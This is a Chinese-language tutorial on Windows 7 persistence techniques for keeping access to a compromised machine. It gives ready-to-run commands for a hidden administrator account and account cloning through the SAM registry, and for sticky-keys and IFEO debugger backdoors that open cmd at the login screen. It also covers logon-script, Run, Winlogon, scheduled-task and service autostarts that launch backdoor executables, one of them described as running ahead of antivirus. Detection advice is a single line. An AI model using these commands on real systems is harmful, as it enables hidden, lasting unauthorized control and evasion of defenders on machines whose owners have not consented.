Windows权限维持

使用环境：Windows 7

1.Windows权限维持-隐藏篇

1.隐藏文件

最简单的一种隐藏文件的方式，文件右键属性，勾选隐藏，点击确定后，在这个文件夹里看不到刚刚的

文件了。

查看“组织-文件夹和搜索选项”显示即可

真正隐藏文件： 使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和 隐藏文件属性。 attrib +s +a +h +r 1.txt

这样就做到了真正的隐藏，不管你是否显示隐藏文件，在此文件夹内都看不见。

我们依然设置显示隐藏文件

并没有看到1.txt

破解隐藏文件： 打开电脑文件夹选项卡，取消”隐藏受保护的操作系统文件“勾选，把”隐藏文件和文件夹“下面的单选选 择“显示隐藏的文件、文件夹和驱动器”。

2.隐藏账号

Windows隐藏系统用户操作，CMD命令行下，建立了一个用户名为test$，密码为111qqq!的简单隐藏

账户，并且把该隐藏账户提升为管理员权限。

net user test$ 111qqq! /add #创建隐藏账号

net localgroup administrators test$ /add #加入管理员组

CMD命令行使用"net user"，看不到"test$"这个账号，但在控制面板和本地用户和组是可以显示此用户

的

想要把该隐藏账户提升为管理员权限，可以进行账号克隆。

克隆账号的制作过程如下：

“开始”→“运行”，输入“regedt32.exe”后回车，到“HKEY_LOCAL_MACHINE\SAM\SAM”，单机右键权限，把名为“administrator”的用户赋予完全控制以及读取的权限，在后面打勾就行，然后关闭注册表编

辑器。

regedt32.exe

再次打开注册表：

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\users\Names

看到Administrator为0x1f4

进入01F4复制administrator的F值到test$账户

更改test$的F值

利用test$/111qqq!远程登录，即是administrator权限，为administrator桌面。

检测和清理方法：

使用D盾_web查杀工具，使用克隆账号检测功能进行查看，可检测出隐藏、克隆账号。

2.Windows权限维持-后门篇

1.粘滞键后门

粘滞键指的是电脑使用中的一种快捷键，专为同时按下两个或多个键有困难的人而设计的。粘滞键的主

要功能是方便Shift等键的组合使用。一般的电脑连按五次shift会出现粘滞键提示。sethc就是windows

中的粘滞键。

sethc.exe文件的属性，默认情况下是属于TrustedInstaller所有，不管是普通用户还是administrator都

没有权限对它进行编辑的。TrustedInstaller是一个安全机制，权限比administrator管理权高，但比

system低。

修改sethc.exe的安全设置当前所有者为administrator

保证administrator对sethc.exe完全控制

粘滞键位置：c:\windows\system32\sethc.exe

move sethc.exe sethc1.exe #将原本的sethc改名为sethc1

copy cmd.exe sethc.exe #将cmd复制并重命名为sethc

此时在登录界面连按五次shift键即可启动cmd，而且不需要登录就可以执行。

2.logon scripts后门

Windows登录脚本，当用户登录时触发，Logon Scripts能够优先于杀毒软件执行，从而绕过杀毒软件

对敏感操作的拦截。

注册表位置：HKEY_CURRENT_USER\Environment

REG ADD "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d

"C:\Users\Administrator\Desktop\5555.exe"

#创建键为：UserInitMprLogonScript，其键值为我们要启动的程序路径

注销之后重新登陆服务器，即可上线

3.映像劫持

“映像劫持”，也被称为“IFEO”（Image File Execution Options），在WindowsNT架构的系统里，IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。

当一个可执行程序位于IFEO的控制中时，它的内存分配则根据该程序的参数来设定，而WindowsN T架

构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据，最终得

以设定一个程序的堆管理机制和一些辅助机制等。出于简化原因，IFEO使用忽略路径的方式来匹配它所

要控制的程序文件名，所以程序无论放在哪个路径，只要名字没有变化，它就运行出问题。

注册表位置：HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

Options\

在此注册表位置添加项sethc.exe，添加debugger键的值为c:\windows\system32\cmd.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

Options\sethc.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

此时点击五次shift键会打开cmd。

4.注册表自启动后门

位置一：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

添加键test1，值为后门程序路径。

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v

test1 /t REG_SZ /d "C:\Users\Administrator\Desktop\7764.exe"

重新启动会自动运行后门程序，上线成功。

位置二：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

修改键Userinit的值，重启就会自动运行程序。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

C:\Users\Administrator\Desktop\5555.exe

5.计划任务后门

schtasks命令设定计划自动启动后门程序。

schtasks /Create /tn Updater /tr C:\Users\Administrator\Desktop\5555.exe /sc

minute /mo 1 #每1分钟自动执行5555.exe

chcp 437 #修改编码

schtasks #查看计划任务

1分钟后收到会话

删除计划任务：

schtasks /delete /tn Updater

6.服务自启动后门

自启动服务一般是在电脑启动后在后台加载指定的服务程序，我们可以将exe文件注册为服务，也可以

将dll文件注册为服务。

sc create test binpath= C:\Users\Administrator\Desktop\5555.exe （注意等号后面有空

格）#创建服务

sc config test start= auto #设置服务为自动启动

net start test #启动服务